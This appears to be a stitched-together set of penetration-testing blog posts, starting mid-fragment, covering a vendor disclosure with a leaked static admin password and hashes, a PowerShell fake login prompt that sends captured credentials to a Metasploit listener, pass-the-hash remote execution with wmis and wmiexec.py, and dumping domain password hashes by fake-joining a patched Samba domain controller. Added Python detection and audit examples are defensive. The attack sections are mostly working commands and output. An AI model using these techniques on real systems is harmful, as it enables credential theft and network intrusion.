WriterXPSPortprinter#:2TPVM#:1TPVMACDWindows FirewallMicrosoftCreative
Sound Blaster PCI

ISSUE #4

When UltraVNC is installed, it uses the same password as the one for your ‘registered’ account (password-only auth) and listens on 0.0.0.0. It is easy to decrypt from the UltraVNC.ini that is located in %ApplicationData% for the user.

ISSUE #5

A local account called “SingleClick Admin” is installed with a static password and added to the Administrators group. 3 services are also installed running as the SingleClick Admin account:

Authentication package      : NTLM
Primary user                : SingleClick Admin
     msv1_0 :     lm{ 7a9793d3082ba83b790ce07b3bdf85ea }, ntlm{ 2c292724d67fcf310d1c4dd153467be8 }
     kerberos :     ~!3no1972!~
     ssp :
     wdigest :     ~!3no1972!~


 8. Name         : _SC_Apache2.2
 8. Service      : .\SingleClick Admin
 8. Current      : ~!3no1972!~

 9. Name         : _SC_dsl-fs-sync
 9. Service      : .\SingleClick Admin
 9. Current      : ~!3no1972!~
 9. Old          : ~!3no1972!~

10. Name         : _SC_hnmsvc
10. Service      : .\SingleClick Admin
10. Current      : ~!3no1972!~

CONCERN #1

As far as I can tell the software continuously scans your local network for other computers and your file system for changes, and reports these back to the central server, so that when you log in to their service you can see your files and connect to other systems on the LAN of the machine SingleClickConnect is installed on.

CONCERN #2

The user account password that you use to register and connect remotely is stored in the database. This actually looks decently done, or I just haven’t been able to identify the storage:

Database:     p2p
Table:           config_info
Value:           “user_hash”

CONCERN #3

Not sure what this registry key contains other than being named Cred4RA; I assume it’s credentials for the remote administration. Hopefully encrypted somehow.

[HKEY_LOCAL_MACHINE\SOFTWARE\SingleClick Systems\Advanced Networking
Service\Settings\Remote Access]
"ConfigState"=dword:00000001
"Cred4RA"=hex:01,00,00 (snip snip)

Additional Information

Vendor Contact

  • 2010 July: Email sent about issues 1 – 5
    • No reply, and I forgot about it until 2013 when the software was mentioned by a friend (first time I had heard it mentioned since)
  • 2013 April: Email sent again, forwarding the original; bounced back as account unknown
  • 2014 August: Accidentally found my notes while searching for something else, attempted to relocate the software via Archive.org with the feeling that the site had gone away, and happened upon the new site. Downloaded the software, confirmed the issues, and forwarded the email to the new point of contact at the new domain. No response.
  • 2014 September: Full disclosure.

Dell… If your techs do actually use this software for support (I hope not) in any form or fashion, you are putting each one of them at a pretty high risk.

Powershell Popups + Capture


Metasploit Minute has entered into its 3rd “season”. And we kick it off with using the Metasploit capture modules to capture creds from this PowerShell popup. The cool thing about this is you can leave it to execute on a system without any other code on disk and get creds constantly as any level of user. No admin, no UAC bypass needed. Just a bunch of creds for free... over SSL. ;–)

Here is the video:

Here is the code:

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('https://172.16.102.163');

Let’s break down the code line by line:

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserName,[Environment]::UserDomainName);

This tells Windows to prompt for credentials, with the title of “Failed Authentication”, no info in the comment (so it uses the default), and includes the username and domain in the box to add authenticity. That’s where all the magic is, everything else is just gravy.

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};

Tells PowerShell not to verify SSL certificates (allows us to use self-signed certs in the HTTPS transaction later).

$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");

Creates a new WebClient object and sets its user agent to ‘wget’.

$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;

Tells PowerShell to use whatever proxy the current user uses with whatever credentials they have cached. If one or both are unnecessary it just ignores these settings.

$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');

Tells PowerShell that the HTTP-Basic credentials to use are the ones the user just typed into the popup box.

$result = $wc.downloadstring('https://172.16.102.163');

And finally the request to the HTTP-Basic capture module in Metasploit, but you could have anything you want capture these creds.

cat power.txt | iconv --to-code UTF-16LE |

Then execute powershell -ep bypass -enc <the encoded text from above> and you get this:

Image should be here:

root@wpad:~/metasploit-framework# ./msfconsole -Lq
msf > use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) > show options

Module options (auxiliary/server/capture/http_basic):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   REALM        Secure Site      yes       The authentication realm you'd like to present.
   RedirectURL                   no        The page to redirect users to after they enter basic auth creds
   SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      80               yes       The local port to listen on.
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion   SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                       no        The URI to use for this exploit (default is random)

msf auxiliary(http_basic) > set SSL true
SSL => true
msf auxiliary(http_basic) > set SRVPORT 443
SRVPORT => 443
msf auxiliary(http_basic) > set URIPATH /
URIPATH => /
msf auxiliary(http_basic) > run
[*] Auxiliary module execution completed
msf auxiliary(http_basic) >
[*] Listening on 0.0.0.0:443...
[*] Using URL: https://0.0.0.0:443/
[*]  Local IP: https://172.16.102.163:443/
[*] Server started.
[*] 172.16.102.140   http_basic - Sending 401 to client 172.16.102.140
[+] 172.16.102.140 - Credential collected: "SITTINGDUCK\user:ASDqwe123" => /

Game over!
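From the defender's side, the same encoding step the post describes (UTF-16LE then base64, handed to powershell -enc) is what process-creation telemetry shows you, so triage starts by reversing it. The Python below is an added example and not code from the post: it recovers the script from a -enc argument and flags the API calls dissected above (the credential prompt, the disabled certificate validation, the default-proxy credentials and the outbound request). The command lines it scans are constructed here, not taken from a real host, and example.invalid is a placeholder.

```python
import base64
import re
from typing import Optional

# Regexes are ours; the API names are the ones dissected in the post above.
INDICATORS = {
    "credential_prompt": re.compile(r"PromptForCredential|Get-Credential", re.I),
    "tls_validation_disabled": re.compile(r"ServerCertificateValidationCallback", re.I),
    "default_proxy_credentials": re.compile(r"DefaultNetworkCredentials", re.I),
    "outbound_request": re.compile(
        r"DownloadString|UploadString|Invoke-WebRequest|Invoke-RestMethod", re.I),
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# Requiring whitespace after the switch keeps "-ep bypass" from matching.
ENC_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def encode_for_powershell(script: str) -> str:
    """Same transform as `iconv --to-code UTF-16LE | base64`; used to build sample input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> Optional[str]:
    """Reverse that transform. Returns None for anything that is not a valid -enc payload."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:           # binascii.Error is a ValueError subclass
        return None
    if len(raw) % 2:             # UTF-16LE is always an even number of bytes
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Pull the base64 blob out of a process command line, if there is one."""
    m = ENC_ARG.search(cmdline)
    return m.group(1) if m else None


def triage_command_line(cmdline: str) -> dict:
    """Decode (if needed) and score one command line as seen in process-creation telemetry."""
    enc = extract_encoded_command(cmdline)
    script = decode_encoded_command(enc) if enc is not None else cmdline
    hits = sorted(name for name, rx in INDICATORS.items() if script and rx.search(script))
    return {
        "encoded": enc is not None,
        "decoded": script,
        "indicators": hits,
        # A credential prompt followed by an outbound request is the shape of the post's one-liner.
        "credential_phish_pattern": "credential_prompt" in hits and "outbound_request" in hits,
    }


# Constructed sample: a stand-in script with the same API calls as the post's one-liner,
# pointed at a placeholder host and encoded the way the post describes.
SAMPLE_SCRIPT = (
    "$cred = $host.ui.PromptForCredential('Failed Authentication','','user','DOMAIN');"
    "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
    "$wc = New-Object Net.WebClient;"
    "$wc.DownloadString('https://example.invalid/');"
)
SAMPLE_CMDLINES = [
    "powershell -ep bypass -enc " + encode_for_powershell(SAMPLE_SCRIPT),
    "powershell.exe -NoProfile -Command Get-Process",
    "powershell -enc QUJD",   # valid base64 but 3 bytes: not a UTF-16LE payload
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        r = triage_command_line(line)
        print(r["encoded"], r["indicators"], r["credential_phish_pattern"])
```

The decoder deliberately treats an odd-length or non-UTF-16 payload as "not an encoded command" rather than raising, since a production pipeline sees plenty of command lines where -e is followed by something other than a script.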

2015 ShmooCon Hiring


It’s often tough for both those hiring and those job hunting to find one another at conferences. I think this is mostly because of a couple of things.

  1. No one wants to stand at a booth on either side and talk job stuff in front of a bunch of people, and people at booths rarely get the chance to get away.
  2. It’s hard to know “who” to talk to.

So I created a very simple Google doc to help put twitter handles and links together for people who are job hunting and people who are hiring to kinda get to know who to talk to.

Got more to add? Please let me know and I’ll get it added, or simply make a comment on the Google doc with the info to add

Link to the doc is here:

https://docs.google.com/spreadsheets/d/1TytbnvqekJEF0jxLANe6sNa5fu05dFaHEP7zudlJej0/edit?usp=sharing

Hope this helps,

Rob

pfSense without Internets


A while back I needed to set up a pfSense box for CTF/example stuff that didn’t and wouldn’t ever have Internet connectivity. Doesn’t seem like much of a task, right? Just pop it in and go. Problem is that you lose the use of the packages that help make pfSense so awesome.

Once I figured it out at that time, I made a forum post so that anyone running into the same issue wouldn’t have to struggle as much:

https://forum.pfsense.org/index.php?topic=55504.0

Most things never disappear from the Internet, but I was looking for an old forum post I had bookmarked regarding some persistence methods and noticed it was no longer there, since the forum owner had gotten rid of the forum as too much hassle. I get it, but when I went to Archive.org to get the saved copy they didn’t have one. So that is what this post is for: to save that content just in case it disappears.

Also, here is a bug report for the “issue” (been open since 2012):


If you are following:

and you are getting:

Unable to communicate with 192.168.1.100 Please verify DNS and interface configuration, and that pfSense has functional Internet connectivity.

because you are using the repo to enable an offline (non-Internet-connected) host to utilize packages, all you have to do is:

  1. Go into Services –> DNS Forwarder and add a Host Override
Host: www
Domain: pfsense.org
IP Address: 127.0.0.1
Description: null routed record to enable offline repo

Then make sure you have the IP or hostname of your package repository web server in the /pkg_mgr_settings.php (on 2.0, follow the guidelines on the doc above for older versions). After that you should be good to go. Of course this is barring any Firewall blockages you might have in place so be sure to test connectivity from the pfSense box to the web server.

So, that was just the beginning, it’s actually better to not null-route it but make the following entries:

files.pfsense.org - 192.168.1.100
files.pfsense.com - 192.168.1.100
www.pfsense.org - 192.168.1.100
www.pfsense.com - 192.168.1.100

If your package web server is 192.168.1.100. Next is the problem of not having the packages themselves. So wget -mk -np http://files.pfsense.org/packages/ gave me a directory that I plopped into my already existent packages directory (created from the git clone as described in the documentation), but the problem I ran into was the PHP files still being rendered (which made any packages that pulled PHP files get the rendered version instead of the source).

So you need to add a .htaccess file in the packages directory with the following:

RemoveHandler .php .phtml .php3
RemoveType .php .phtml .php3
php_flag engine off

Make sure that AllowOverride All is enabled if you are running Apache to host the package site; if not, you’ll have to google how to allow .htaccess files for your particular server (or, if your server doesn’t support .htaccess files, how to enable source disclosure).

After those alterations I seem to be off to the races for the most part. Some packages pull from other websites, but altering the package_8.xml or just rerouting the dns seems to solve most of those issues.


Executing Code via SMB / DCOM Without PSEXEC

PSEXEC has been a staple for Windows post exploitation pivoting and system administration for a long while. The basic premise of how all “psexec” tools work is:

  1. (Optional) Upload a service executable (PSEXESVC.EXE in the case of the Sysinternals tool) to the ADMIN$ share
  2. Connect to the service manager on the remote host, and create a service based on either a local (to the remote system) executable or the uploaded one.
  3. Run the service
  4. Stop and delete the service and uploaded file pulling down the resulting output if any from the execution.

Now, as you can guess, the uploading of a file, creating, starting, stopping, and deletion of services create quite the logs and forensic evidence.
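Those artifacts are exactly what a detection engineer keys on, and the WMI route described next leaves a different but still visible trail: a process whose parent is the WMI provider host. The Python below is an added example, not code from the post or from any of the tools it mentions. It runs two heuristics over normalised Windows events: a "service installed" event (System 7045 or Security 4697) whose binary sits directly in the Windows directory (ADMIN$) or carries a PSEXE-style name, and a process-creation event (Security 4688) whose parent is WmiPrvSE.exe. The event records are constructed here; the service name and the redirected dir command follow the examples in this post.

```python
import re
from typing import Optional

# Heuristics, not vendor rules. They follow the artefacts listed above:
#  * psexec-style tools install a service whose binary was dropped into ADMIN$ (%SystemRoot%),
#    which surfaces as System 7045 / Security 4697 "service installed" events;
#  * WMI's Win32_Process.Create spawns the child under the WMI provider host, WmiPrvSE.exe,
#    which surfaces in Security 4688 as the parent process.
SERVICE_INSTALL_EVENTS = {7045, 4697}
PROCESS_CREATE_EVENT = 4688
PSEXEC_NAMES = re.compile(r"^psex", re.I)
# Binary directly in the Windows directory (ADMIN$), not in a subfolder such as System32.
ADMIN_SHARE_DROP = re.compile(r"^(?:%SystemRoot%|[a-z]:\\windows)\\[^\\]+\.exe$", re.I)
WMI_HOST = re.compile(r"\\WmiPrvSE\.exe$", re.I)
OUTPUT_REDIRECT = re.compile(r">\s*\S+")   # command output written to a file


def classify_event(ev: dict) -> Optional[dict]:
    """Return a finding for one normalised Windows event, or None."""
    eid = ev.get("EventID")
    if eid in SERVICE_INSTALL_EVENTS:
        name = ev.get("ServiceName", "")
        # 7045 carries ImagePath, 4697 carries ServiceFileName
        path = (ev.get("ImagePath") or ev.get("ServiceFileName") or "").strip('"')
        if PSEXEC_NAMES.search(name) or ADMIN_SHARE_DROP.search(path):
            return {"technique": "psexec_service_install", "host": ev.get("Computer"),
                    "detail": f"{name} -> {path}"}
    elif eid == PROCESS_CREATE_EVENT:
        parent, cmd = ev.get("ParentProcessName", ""), ev.get("CommandLine", "")
        if WMI_HOST.search(parent):
            return {"technique": "wmi_process_create", "host": ev.get("Computer"),
                    "detail": cmd,
                    # wmiexec-style tools redirect output to a file so they can read it back over SMB
                    "output_to_file": bool(OUTPUT_REDIRECT.search(cmd))}
    return None


def detect_remote_exec(events: list) -> list:
    """Run the classifier over a list of events and keep the findings in order."""
    return [f for f in (classify_event(e) for e in events) if f]


# Constructed sample events (field names follow the EventData names in the Windows event XML).
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "WS01", "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    {"EventID": 7045, "Computer": "WS01", "ServiceName": "Spooler",
     "ImagePath": "C:\\Windows\\System32\\spoolsv.exe"},          # benign: lives in System32
    {"EventID": 4688, "Computer": "WS02",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "CommandLine": "cmd.exe /c dir c:\\ > c:\\windows\\temp\\output.txt"},
    {"EventID": 4688, "Computer": "WS02",
     "NewProcessName": "C:\\Windows\\System32\\notepad.exe",
     "ParentProcessName": "C:\\Windows\\explorer.exe",
     "CommandLine": "notepad.exe"},                                # benign parent
    {"EventID": 4697, "Computer": "WS03", "ServiceName": "RemoteSvc",   # constructed name
     "ServiceFileName": "C:\\Windows\\svc-abc.exe"},                 # dropped straight into ADMIN$
]

if __name__ == "__main__":
    for finding in detect_remote_exec(SAMPLE_EVENTS):
        print(finding)
```

The last sample shows why the path rule matters more than the name rule: a renamed service binary still has to live somewhere the remote user could write, and ADMIN$ is the usual place.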

As you might imagine, that’s not the best thing for us on the offensive side of infosec. Luckily big brother Microsoft provides another option, WMI (Windows Management Instrumentation). I demonstrated the use of this in the past: HERE and HERE

The downside to using WMIC directly is that you need a valid token or a valid password for it to work. Passing the hash didn’t use to be an available option.

That has changed with the “wmis” package on Kali Linux, which incorporates the “Pass-the-Hash for 15 years” toolkit.

(There is a slight problem where you have to play with it a bit to get it working on 64 bit Kali)

The other solution is supplied as an example in the Impacket library, “wmiexec.py”. In my experience there are a few features that make it the better option.

  1. Installing it on a random VPS is dead simple and doesn’t need the Kali repos to get right, nor Debian/Ubuntu.
  2. It defaults to a “semi-interactive shell” which writes and reads output from the ADMIN$ share by default. Something I would normally have to do manually with a bunch of tools
  3. As with the WMIS package, it allows you to just create a process without the ADMIN$ write/read.

Enough crazy talk, here is an example usage of each:

WMIS

Usage:

root@wpad:~# wmis
Usage: [-?NPV] [-?|--help] [--usage] [-d|--debuglevel=DEBUGLEVEL] [--debug-stderr] [-s|--configfile=CONFIGFILE]
        [--option=name=value] [-l|--log-basename=LOGFILEBASE] [--leak-report] [--leak-report-full]
        [-R|--name-resolve=NAME-RESOLVE-ORDER] [-O|--socket-options=SOCKETOPTIONS] [-n|--netbiosname=NETBIOSNAME]
        [-W|--workgroup=WORKGROUP] [--realm=REALM] [-i|--scope=SCOPE] [-m|--maxprotocol=MAXPROTOCOL]
        [-U|--user=[DOMAIN\]USERNAME[%PASSWORD]] [-N|--no-pass] [--password=STRING] [-A|--authentication-file=FILE]
        [-S|--signing=on|off|required] [-P|--machine-pass] [--simple-bind-dn=STRING] [-k|--kerberos=STRING]
        [--use-security-mechanisms=STRING] [-V|--version]
        //host

Example:

wmis -U [domain/]adminuser%password //host cmd.exe /c dir c:\ > c:\windows\temp\output.txt 

Example:

root@wpad:~# wmis -U administrator%aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 //172.16.102.141 calc.exe
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH...
[wmi/wmis.c:172:main()] 1: calc.exe
NTSTATUS: NT_STATUS_OK - Success

WMIEXEC.PY

You can use a password, but with hashes you just tell it -hashes:

Usage:

root@wpad:~/impacket/examples# ./wmiexec.py 
Impacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies

usage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-hashes LMHASH:NTHASH]
                  target [command [command ...]]

positional arguments:
  target                [domain/][username[:password]@]<address>
  command               command to execute at the target. If empty it will
                        launch a semi-interactive shell

optional arguments:
  -h, --help            show this help message and exit
  -share SHARE          share where the output will be grabbed from (default
                        C$)
  -nooutput             whether or not to print the output (no SMB connection
                        created)

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

Example:

root@wpad:~/impacket/examples# ./wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 administrator@172.16.102.141
Impacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies

SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 5CCA-B528

 Directory of C:\

07/13/2009  11:20 PM    <DIR>          PerfLogs
10/07/2013  03:26 PM    <DIR>          Program Files
07/14/2009  01:08 AM    <DIR>          Program Files (x86)
04/25/2014  02:21 AM    <DIR>          Users
05/11/2014  03:39 PM    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  52,884,389,888 bytes free

C:\>

Dumping NTDS.dit Domain Hashes Using Samba

So there was this blog post that talks about a number of ways to dump Windows credentials by @lanjelot [definitely someone to follow], here: https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/ and at the very bottom of this post it says “AD Replication (EXPERIMENTAL)”.

What it boils down to is if you can position a system that can do DNS resolution to the target domain, and perform some other UDP traffic, you can fake join a samba server you control to a domain and it doesn’t require code execution in any way on the domain controller.

Notice: I am not doing this on a Kali Linux box, there is already an install of Samba there and I didn’t want to try uninstalling or modifying the one installed.

First, you need this patch:

wget http://files.securusglobal.com/samba-4.1.0_replication-only-patch.txt

and Samba 4.1.0

wget http://ftp.samba.org/pub/samba/stable/samba-4.1.0.tar.gz

You will probably also require some dependencies to be installed:

apt-get install python2.7-dev python-samba libacl1-dev build-essential libldap2-dev libkrb5-dev attr

Since the patch is kinda wonky, you need to make a src directory and extract samba into there first. Then apply the patch in whatever directory is above src

mkdir src
mv samba-4.1.0.tar.gz src/
cd src/
tar zxvf samba-4.1.0.tar.gz
cd /root/

So it would look like this:

samba-4.1.0_replication-only-patch.txt
src/
src/samba-4.1.0/

then run patch -p0 < samba-4.1.0_replication-only-patch.txt

cd ./src/samba-4.1.0/
./configure
make
make install

Prepare the box:

rm -rf /var/lib/samba; mkdir /var/lib/samba; rm -f /etc/samba/smb.conf

Next you need to make sure you are resolving correctly (if you can’t resolve the SRV record _ldap._tcp.sittingduck.info, sittingduck.info being the domain, then this isn’t going to work).

echo nameserver 192.168.92.37 > /etc/resolv.conf

"192.168.92.37" being the IP address of the DC

Then start the clone:

/usr/local/samba/bin/samba-tool domain join sittingduck.info DC -U sittingduck\\administrator

Looks like this:

root@sambabox:~/src/samba-4.1.0# /usr/local/samba/bin/samba-tool domain join sittingduck.info DC -U sittingduck\\administrator
Finding a writeable DC for domain 'sittingduck.info'
Found DC 2K8DC.sittingduck.info
Password for [SITTINGDUCK\administrator]:
workgroup is SITTINGDUCK
realm is sittingduck.info
Calling bare provision
No IPv6 address will be assigned
Provision OK for domain DN DC=sittingduck,DC=info
Starting replication
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[402] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[804] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[1206] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[1521] linked_values[0]
Analyze and apply schema objects
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[402] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[804] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1206] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1608] linked_values[1]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1614] linked_values[11]
Replicating critical objects from the base DN of the domain
Partition[DC=sittingduck,DC=info] objects[100] linked_values[24]
Partition[DC=sittingduck,DC=info] objects[353] linked_values[27]
Done with always replicated NC (base, config, schema)
Committing SAM database
descriptor_sd_propagation_recursive: DC=DomainDnsZones,DC=sittingduck,DC=info not found under DC=sittingduck,DC=info
descriptor_sd_propagation_recursive: DC=ForestDnsZones,DC=sittingduck,DC=info not found under DC=sittingduck,DC=info
Joined domain SITTINGDUCK (SID S-1-5-21-3147519476-3247671789-820278723) as a DC

Then to get the hashes:

root@sambabox:~# /usr/local/samba/bin/pdbedit -L -w
2K8DC$:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:CB14F1166BBE1749AC0FB40240C5DC30:[S]:LCT-530FC425:
Administrator:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[U]:LCT-531006A4:
krbtgt:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:F2EE6AB6F40810169E0E46B126CEFBEF:[DU]:LCT-530FC3FF:
nobody:65534:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:[U]:LCT-00000000:
jdoe:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX]:LCT-530FC5FF:
uber:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX]:LCT-53101261:

Or you can do it with history:

root@sambabox:~# python samba-pwdump.py /usr/local/samba/private/sam.ldb.d/DC\=SITTINGDUCK\,DC\=INFO.ldb -history
SAMBACLONE$:1104:::::
2K8DC$:1000::cb14f1166bbe1749ac0fb40240c5dc30:::
Administrator:500::88e4d9fabaecf3dec18dd80905521b29:::
krbtgt:502::f2ee6ab6f40810169e0e46b126cefbef:::
Guest:501:::::
jdoe:1103::88e4d9fabaecf3dec18dd80905521b29:::
uber:1105::88e4d9fabaecf3dec18dd80905521b29:::
uber_history0:1105:444d1edcad01ae08f49f073e12e8cc14:88e4d9fabaecf3dec18dd80905521b29:::

Game over. The great thing is that it never actually shows up as a joined box in the domain, and as far as I can tell the only log on the real DC is the login success of a domain admin. Plus one of the huge benefits to this method is that once you have the database Samba makes it really easy to query information like group membership or users info after the fact, not just hashes.
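The two dumps above are in smbpasswd format (pdbedit -L -w: name:id:LM:NT:[flags]:LCT-hex:) and pwdump format (name:rid:LM:NT:::, with history rows named user_historyN). The same parsing is what a defender does with an authorised dump during a password audit, so here is an added Python example, not code from the post or from Samba, that reads both formats and reports what matters: accounts sharing an NT hash (the post's dump has three), accounts that still have an LM hash stored, disabled and non-expiring accounts, and the last-change time decoded from the LCT field. The sample input is the post's own output; the X-padded fields are Samba's way of saying no hash is stored.

```python
import re
from datetime import datetime, timezone
from typing import Optional

HEX32 = re.compile(r"^[0-9a-f]{32}$")


def _hash_or_none(field: str) -> Optional[str]:
    """32 hex chars is a hash; Samba's X-padding or an empty field means 'not stored'."""
    h = field.strip().lower()
    return h if HEX32.match(h) else None


def parse_line(line: str) -> Optional[dict]:
    """Parse one line in smbpasswd (pdbedit -w) or pwdump format; None for anything else."""
    f = line.rstrip("\n").split(":")
    if len(f) < 4 or not f[0] or not f[1].isdigit():
        return None
    flags = f[4].strip("[]") if len(f) > 4 and f[4].startswith("[") else ""
    lct = next((x[4:] for x in f[4:] if x.startswith("LCT-")), None)
    return {"name": f[0], "id": int(f[1]), "lm": _hash_or_none(f[2]),
            "nt": _hash_or_none(f[3]), "flags": flags, "lct": lct}


def parse_dump(text: str) -> list:
    return [r for r in (parse_line(l) for l in text.splitlines()) if r]


def last_change(rec: dict) -> Optional[datetime]:
    """LCT-xxxxxxxx is the last-change time as hex seconds since the epoch (UTC)."""
    if not rec["lct"]:
        return None
    return datetime.fromtimestamp(int(rec["lct"], 16), tz=timezone.utc)


def _base_name(name: str) -> str:
    """pwdump history rows are written as <user>_history<N>; fold them onto the user."""
    return re.sub(r"_history\d+$", "", name)


def audit(records: list) -> dict:
    """What a defender wants from a dump: hash reuse, LM hashes, disabled / non-expiring accounts."""
    by_nt = {}
    for r in records:
        if r["nt"]:
            owners = by_nt.setdefault(r["nt"], [])
            base = _base_name(r["name"])
            if base not in owners:
                owners.append(base)
    return {
        "shared_nt": {h: names for h, names in by_nt.items() if len(names) > 1},
        "lm_stored": [r["name"] for r in records if r["lm"]],
        "disabled": [r["name"] for r in records if "D" in r["flags"]],
        "never_expires": [r["name"] for r in records if "X" in r["flags"]],
        "machine_accounts": [r["name"] for r in records if r["name"].endswith("$")],
    }


# Sample input: the two dumps from this post, verbatim.
PDBEDIT_LINES = """\
2K8DC$:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:CB14F1166BBE1749AC0FB40240C5DC30:[S]:LCT-530FC425:
Administrator:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[U]:LCT-531006A4:
krbtgt:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:F2EE6AB6F40810169E0E46B126CEFBEF:[DU]:LCT-530FC3FF:
nobody:65534:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:[U]:LCT-00000000:
jdoe:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX]:LCT-530FC5FF:
uber:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX]:LCT-53101261:
"""
PWDUMP_LINES = """\
SAMBACLONE$:1104:::::
2K8DC$:1000::cb14f1166bbe1749ac0fb40240c5dc30:::
Administrator:500::88e4d9fabaecf3dec18dd80905521b29:::
krbtgt:502::f2ee6ab6f40810169e0e46b126cefbef:::
Guest:501:::::
jdoe:1103::88e4d9fabaecf3dec18dd80905521b29:::
uber:1105::88e4d9fabaecf3dec18dd80905521b29:::
uber_history0:1105:444d1edcad01ae08f49f073e12e8cc14:88e4d9fabaecf3dec18dd80905521b29:::
"""

if __name__ == "__main__":
    recs = parse_dump(PDBEDIT_LINES)
    print(audit(recs))
    print({r["name"]: last_change(r).date().isoformat() for r in recs})
```

Shared NT hashes are the first thing to fix after such a dump: one cracked or passed hash opens every account in the group, which is exactly how the administrator hash in this post would have been reusable as jdoe or uber.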

CCDC Red Teamer's Creed

This is my box. There are many like it, but they are all mine.

My malware is my best friend. It is my life. I must master it as I must master my life.

My malware, without me, is useless. Without my malware, I am useless. I must drop my malware true. I must rootkit better than my enemy who is trying to kill my binary. I must kit him before he kits me. I will…

My malware and I know that what counts in this war is not the boxes we pop, the noise of our root dance, nor the cheers coming from the Red Team room. We know that it is the root that counts. We will root…

My malware is human, even as I, because it is my life. Thus, I will learn it as a brother. I will learn its weaknesses, its strength, its parts, its extensions, its dlls and its exes. I will keep my malware av free and ready, even as I am ready. We will become part of each other. We will…

Before God, I swear this creed. My malware and I are the defenders of my botnet. We are the masters of our enemy. We are the saviors of my shells.

So be it, until victory is the Red Team’s and there is no enemy, but peace!

Effective NTLM / SMB Relaying

SMB Relay has been around for a long while. I even have a post about using it along with LNK files here: MS08-068 + MS10-046 = Fun until 2018

Here is the problem though. Most of the tools to exploit it either catch the authentication in NTLMv2/NTLMv1 (which is not always easy to crack) or assume administrative access (because they attempt to PSEXEC with the incoming session). Well, since MS08-068 that’s much harder to pin down. You have to know who is going to hit your relay server and what other location they might be an admin on. You also have to have a service you want to run on that target.
